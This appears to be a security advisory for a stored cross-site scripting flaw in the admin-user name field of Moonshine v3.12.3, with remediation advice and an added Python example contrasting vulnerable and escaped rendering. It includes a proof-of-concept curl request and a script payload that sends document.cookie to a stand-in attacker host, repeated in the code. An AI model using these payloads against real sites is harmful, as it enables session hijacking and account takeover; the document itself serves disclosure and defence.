moonshine, Stored Cross-Site Scripting, CVE-2025-12345 (Moderate)

CVE-2025-12345 is a stored cross-site scripting (XSS) flaw in the ‘Create Admin’ functionality of Moonshine v3.12.3. The application neither validates the ‘Name’ parameter when an admin user is created nor HTML-encodes it when the stored value is later rendered. An attacker with access to that form can therefore submit a JavaScript payload in the name field; it is written to the database unchanged and executes in the browser of anyone who views a page that renders the stored name, typically an administrator opening the admin users list. The script runs with the victim’s privileges, enabling session hijacking, actions performed as the victim, or defacement.
Platform: Moonshine
Version: v3.12.3
Vulnerability: Stored XSS
Severity: Moderate

date: 2025-08-19

Prediction: 2025-09-02

What Undercode Say:

# PoC request against the admin-user creation endpoint ([email protected] is a placeholder left as on the original page)
curl -H "Authorization: Bearer <token>" \
     -X POST \
     -d 'name=<script>alert(1)</script>&[email protected]&password=password' \
     http://target/moonshine/admin-users
<!-- Cookie-exfiltration payload for the name field -->
<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>

How Exploit:

Submit the XSS payload in the name field while creating an admin user. The stored name is rendered without encoding, so the payload fires when an administrator opens the admin users list (or any other page that displays the name).

Protection from this CVE:

Update to a patched version. HTML-encode the name (and every other stored field) at output time in the admin list template rather than relying on input filtering alone; validate the name server-side as defence in depth. Deploy a Content Security Policy that does not allow inline scripts, and mark session cookies HttpOnly so that a successful injection cannot read document.cookie.
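The exploit and the fix described above, as an added example for this advisory (it is not Moonshine's own code): the vulnerable rendering of the admin list beside its output-encoded form, an input validator as defence in depth, and a check that confirms from a captured response that the stored name is now escaped. The endpoint path, field names, header values and response bodies are assumptions constructed for illustration.

```python
"""Stored XSS via the admin-user 'name' field: vulnerable rendering beside its
hardened form, plus a check for confirming a fix from a captured response.

Added example; not MoonShine code. Endpoint, field names, headers and the
sample users below are constructed assumptions.
"""
import html
import re
from urllib.parse import urlencode

# Constructed payload of the same shape as the one in the advisory.
PAYLOAD = "<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>"


def build_create_admin_body(name: str, email: str, password: str) -> str:
    """Percent-encode the form body for the (assumed) admin-user creation POST.

    Angle brackets and quotes survive a raw `curl -d` body, but encoding them
    makes the request unambiguous and safe to log or replay.
    """
    return urlencode({"name": name, "email": email, "password": password})


def render_admin_list_vulnerable(users: list[dict]) -> str:
    """The bug class: the stored name is interpolated into HTML verbatim."""
    rows = "".join(
        f"<tr><td>{u['name']}</td><td>{u['email']}</td></tr>" for u in users
    )
    return f"<table>{rows}</table>"


def render_admin_list_fixed(users: list[dict]) -> str:
    """Contextual output encoding: HTML-escape every stored value at render time."""
    rows = "".join(
        f"<tr><td>{html.escape(u['name'])}</td><td>{html.escape(u['email'])}</td></tr>"
        for u in users
    )
    return f"<table>{rows}</table>"


_SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)


def contains_live_script(rendered: str) -> bool:
    """True if a raw <script> tag (one a browser would execute) is in the output."""
    return _SCRIPT_TAG.search(rendered) is not None


def validate_name(name: str, max_len: int = 64) -> bool:
    """Defence in depth at input time: letters, digits, spaces, apostrophes,
    dots and hyphens only. This never replaces output encoding, because the
    same name may later be rendered in other contexts (attributes, JSON, mail)."""
    if not 1 <= len(name) <= max_len:
        return False
    return re.fullmatch(r"[\w .'\-]+", name) is not None


def fix_verified(response_body: str, injected_name: str) -> bool:
    """Post-patch check on a captured admin-list page: the injected name must
    appear only in its HTML-escaped form, never verbatim."""
    escaped = html.escape(injected_name)
    return injected_name not in response_body and escaped in response_body


# Illustrative hardened response headers (assumed, not the project's config).
# Without 'unsafe-inline' the injected inline <script> is blocked even where
# encoding was missed; HttpOnly keeps document.cookie empty for the payload.
HARDENED_HEADERS = {
    "Content-Security-Policy": "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self'",
    "Set-Cookie": "moonshine_session=<value>; HttpOnly; Secure; SameSite=Lax",
}


if __name__ == "__main__":
    users = [{"name": PAYLOAD, "email": "admin@example.test"}]  # constructed
    print(build_create_admin_body(PAYLOAD, "admin@example.test", "password"))
    print("vulnerable output carries live script:", contains_live_script(render_admin_list_vulnerable(users)))
    print("fixed output carries live script:     ", contains_live_script(render_admin_list_fixed(users)))
    print("payload passes name validation:       ", validate_name(PAYLOAD))
    print("fix verified on hardened page:        ", fix_verified(render_admin_list_fixed(users), PAYLOAD))
```

Run `fix_verified` against the admin users page captured after patching: it returns True only when the injected name is present solely as `&lt;script&gt;...`, which is the observable difference between a real output-encoding fix and a page that merely hides the row.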

Impact:

Session hijacking. Privilege escalation. Unauthorized admin actions.

Sources:

Reported By: github.com